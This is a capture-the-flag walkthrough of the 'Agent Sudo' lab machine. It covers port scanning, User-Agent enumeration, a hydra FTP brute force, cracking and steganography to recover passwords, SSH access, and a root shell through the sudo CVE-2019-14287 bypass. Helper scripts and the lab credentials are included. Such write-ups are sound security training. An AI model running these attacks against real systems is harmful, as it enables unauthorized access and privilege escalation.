Agent Sudo

1. Reconnaissance:

export TARGET_IP=10.10.17.101
nmap -p- --min-rate 5000 $TARGET_IP
Not shown: 65318 closed tcp ports (reset), 214 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

2. HTTP Service Analysis:

Navigating to http://$TARGET_IP/ reveals the following message:

Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R

This indicates that the server inspects the User-Agent header and only serves content to a recognised value; the note implies that a valid value is an agent's codename.

3. User-Agent Enumeration:

The notes are signed by single-letter agents (Agent R, agent J), so the working hypothesis is that each codename is one capital letter. curl's -A flag sets the User-Agent header, and -L follows any redirect the server returns for an accepted codename.

curl -A "R" -L $TARGET_IP
What are you doing! Are you one of the 25 employees? If not, I going to report this incident

R is rejected. The reply's mention of 25 employees is consistent with one codename per remaining letter, so the other letters are tried in turn.

curl -A "C" -L $TARGET_IP
Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>
From,<br>
Agent R

User-Agent C maps to the user chris, and Agent R's note says his password is weak. Together with the open FTP service, that justifies an online dictionary attack against chris's FTP login.
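Rather than guessing letters one at a time, the whole single-letter codename space can be swept. The script below is an added example, not part of the original writeup: it assumes TARGET_IP is exported as above and that the generic rejection page contains the "25 employees" sentence shown, and it prints only the letters whose response differs from that rejection.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): sweep User-Agent values A..Z
# against the target and report which letters get a response other than the
# generic rejection page.
# Assumptions: TARGET_IP is exported as in the writeup; the rejection page
# contains the "25 employees" sentence quoted above.

REJECT_MARKER="25 employees"

# is_rejection BODY -> 0 if BODY is the generic rejection page, 1 otherwise
is_rejection() {
  case "$1" in
    *"$REJECT_MARKER"*) return 0 ;;
    *) return 1 ;;
  esac
}

# classify_response LETTER BODY -> prints "LETTER hit" or "LETTER miss"
classify_response() {
  if is_rejection "$2"; then
    echo "$1 miss"
  else
    echo "$1 hit"
  fi
}

# enumerate_agents: one request per letter, following redirects (-L) and
# skipping letters whose request failed; prints only the hits.
enumerate_agents() {
  local letter body
  for letter in A B C D E F G H I J K L M N O P Q R S T U V W X Y Z; do
    body=$(curl -s -L -A "$letter" "http://$TARGET_IP/") || continue
    classify_response "$letter" "$body"
  done | grep ' hit$'
}

# Only touch the network when a target is configured.
if [ -n "${TARGET_IP:-}" ]; then
  enumerate_agents
fi
```

Every letter that is not a hit gets the same rejection page, so filtering on that marker is enough to separate the codenames (here C) from the noise; if the site changed its rejection text, REJECT_MARKER is the only thing to update.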

4. FTP Password Cracking:

hydra -V -l "chris" -P /usr/share/wordlists/rockyou.txt ftp://$TARGET_IP -f

hydra -l fixes the username, -P supplies the wordlist, -V prints every attempt and -f stops after the first valid pair. Hydra identifies the password:

[21][ftp] host: 10.10.17.101   login: chris   password: crystal

5. FTP Access and File Retrieval:

FTP is used to connect to the target with the discovered credentials and retrieve all files.

ftp $TARGET_IP # Credentials: `chris:crystal`
ftp> mget * # Download everything

The contents of To_agentJ.txt are examined:

cat To_agentJ.txt
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C

This points to steganography. The FTP download includes two images, cutie.png and cute-alien.jpg; the note says Agent J's login password is hidden in one of them, so both are examined for embedded data, starting with cutie.png.

6. Steganography and ZIP Extraction:

binwalk is used to analyze cutie.png for embedded data.

binwalk -e cutie.png
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
WARNING: One or more files failed to extract: either no utility was found or it's unimplemented

Binwalk finds a password-protected ZIP appended after the PNG data. The warning appears because the archive is encrypted and cannot be unpacked automatically; binwalk still writes the carved bytes to _cutie.png.extracted/8702.zip, named after the archive's hex offset. zip2john converts the archive into a hash that john can crack.
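When binwalk's extraction fails outright, or the carved file is missing, the archive can be located and cut out by hand from the offset binwalk reports (decimal 34562, hex 0x8702 here). The script below is an added example, not part of the original writeup; it assumes only od, awk and tail, and uses a constructed sample file rather than the real cutie.png.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): find ZIP local-file-header
# signatures (PK\x03\x04) inside any file and carve from that offset to end of
# file, the manual fallback when binwalk -e warns that extraction failed.
# Assumes POSIX od, awk and tail; the whole file is hexdumped into one awk
# record, which is fine for images of a few megabytes.

# find_zip_offsets FILE -> prints the 0-based byte offset of every PK\3\4 signature
find_zip_offsets() {
  od -An -v -tx1 "$1" | tr -d ' \n' | awk '
    {
      s = $0; pos = 1
      while ((p = index(substr(s, pos), "504b0304")) > 0) {
        abs = pos + p - 1                          # 1-based index into the hex string
        if ((abs - 1) % 2 == 0) print (abs - 1) / 2  # keep only byte-aligned matches
        pos = abs + 1
      }
    }'
}

# carve_from_offset FILE OFFSET OUT -> copies FILE[OFFSET..EOF] to OUT
carve_from_offset() {
  tail -c +"$(( $2 + 1 ))" "$1" > "$3"
}

# carve_first_zip FILE OUT -> carves the first embedded archive, prints the offset used
carve_first_zip() {
  local off
  off=$(find_zip_offsets "$1" | head -n 1)
  [ -n "$off" ] || { echo "no zip signature found in $1" >&2; return 1; }
  carve_from_offset "$1" "$off" "$2"
  echo "$off"
}

# make_sample OUT -> constructed stand-in for cutie.png: 16 bytes of filler
# followed by a ZIP local-file-header signature and dummy payload.
make_sample() {
  printf 'NOT-A-REAL-PNG..' > "$1"
  printf 'PK\003\004payload' >> "$1"
}
```

On the real file, carve_first_zip cutie.png 8702.zip followed by zip2john reproduces what binwalk did. Carving to end of file works because the archive sits after the PNG's IEND chunk with nothing behind it; ZIP readers locate the central directory from the end of the file, so an archive followed by further trailing data would also need its tail trimmed.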

cd _cutie.png.extracted
zip2john 8702.zip > hash && john --wordlist=/usr/share/wordlists/rockyou.txt hash # alien
7z e 8702.zip

john recovers the password "alien". 7z e extracts 8702.zip with it (7z prompts for the password because the archive is encrypted), and the extracted To_agentR.txt is read:

cat To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R

The base64 encoded string "QXJlYTUx" is decoded to "Area51".

echo "QXJlYTUx" | base64 -d # Area51

The string "Area51" is likely another password.

7. Steghide Extraction and User Password Retrieval:

steghide extract -sf cute-alien.jpg # Password: Area51
cat message.txt

The extracted message.txt reveals the password for user "james":

Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris

8. SSH Access and Privilege Escalation Assessment:

ssh james@$TARGET_IP # Password: hackerrules!
id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

The output of id confirms the login as james and shows membership of the sudo group. The lxd group is also present, which is a separate and well-known escalation path, but sudo is the route followed here.

The file Alien_autospy.jpg is downloaded for further analysis.

Attacker Machine
scp james@$TARGET_IP:~/Alien_autospy.jpg . # Password: hackerrules!

An image search on Alien_autospy.jpg identifies the photo as a frame from the Roswell alien autopsy footage.

The sudo -l command is used to determine what commands "james" can execute with elevated privileges.

Target Machine
sudo -l
(ALL, !root) /bin/bash

The output shows that james may run /bin/bash as any user except root. That exclusion can be bypassed in sudo versions before 1.8.28 (CVE-2019-14287), so the installed version is checked:

sudo --version # Sudo version 1.8.21p2
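The two facts that make this route usable, a sudo release older than 1.8.28 and a runas list that grants ALL while excluding only root, can be checked mechanically. The script below is an added example, not part of the original writeup; it parses the text of sudo --version and sudo -l (captured output works as well as a live run) and reports whether the CVE-2019-14287 condition holds.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): decide from the output of
# `sudo --version` and `sudo -l` whether the CVE-2019-14287 condition holds:
# sudo older than 1.8.28 together with a runas list of the form (ALL, !root)
# or (ALL, !#0). Works on captured strings so it can run off-target.

# sudo_version_from STRING -> extracts e.g. "1.8.21p2" from "Sudo version 1.8.21p2"
sudo_version_from() {
  printf '%s\n' "$1" \
    | sed -n 's/^Sudo version \([0-9][0-9.]*\(p[0-9]*\)\{0,1\}\).*/\1/p' \
    | head -n 1
}

# version_lt A B -> 0 if A < B, comparing dotted numeric fields. A "pN" patch
# suffix is dropped because the fix shipped in the 1.8.28 base release.
version_lt() {
  awk -v a="${1%%p*}" -v b="${2%%p*}" 'BEGIN {
    na = split(a, x, "."); nb = split(b, y, ".")
    n = (na > nb) ? na : nb
    for (i = 1; i <= n; i++) {
      xi = (i <= na) ? x[i] + 0 : 0
      yi = (i <= nb) ? y[i] + 0 : 0
      if (xi < yi) exit 0
      if (xi > yi) exit 1
    }
    exit 1
  }'
}

# has_excluded_root_rule STRING -> 0 if any sudo -l line grants (ALL[:group], !root) or !#0
has_excluded_root_rule() {
  printf '%s\n' "$1" | grep -Eq '\(ALL[^,)]*,[[:space:]]*!(root|#0)[[:space:]]*\)'
}

# check_cve_2019_14287 VERSION_OUTPUT SUDO_L_OUTPUT -> prints "vulnerable" or "not vulnerable"
check_cve_2019_14287() {
  local ver
  ver=$(sudo_version_from "$1")
  if [ -n "$ver" ] && version_lt "$ver" "1.8.28" && has_excluded_root_rule "$2"; then
    echo "vulnerable"
  else
    echo "not vulnerable"
  fi
}

# Run against the live host when invoked with --live (sudo -l may prompt for the password).
if [ "${1:-}" = "--live" ]; then
  check_cve_2019_14287 "$(sudo --version 2>/dev/null)" "$(sudo -l 2>/dev/null)"
fi
```

The version test alone is not enough: a patched sudo with the same (ALL, !root) rule rejects -u#-1, and an old sudo whose rules carry no exclusion needs no bypass, so both conditions are required before the -1 trick is worth trying.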

9. Privilege Escalation (CVE-2019-14287):

sudo compares the requested user against the runas list by numeric id. The id -1 (or its unsigned form 4294967295) is not covered by !root, which excludes only uid 0, so the policy check passes. sudo then passes -1 to setresuid()/setreuid(), which the kernel treats as "leave unchanged"; because sudo is already running setuid-root, the effective uid stays 0. Only the uid is touched, so the resulting shell keeps james's primary group.

sudo -u#-1 /bin/bash # equivalently: sudo -u#4294967295 /bin/bash
id # uid=0(root) gid=1000(james) groups=1000(james)

The id command confirms that the shell is running with uid 0 (root); the gid is still 1000 (james) because the bypass only affects the user id, which does not limit what the root shell can do.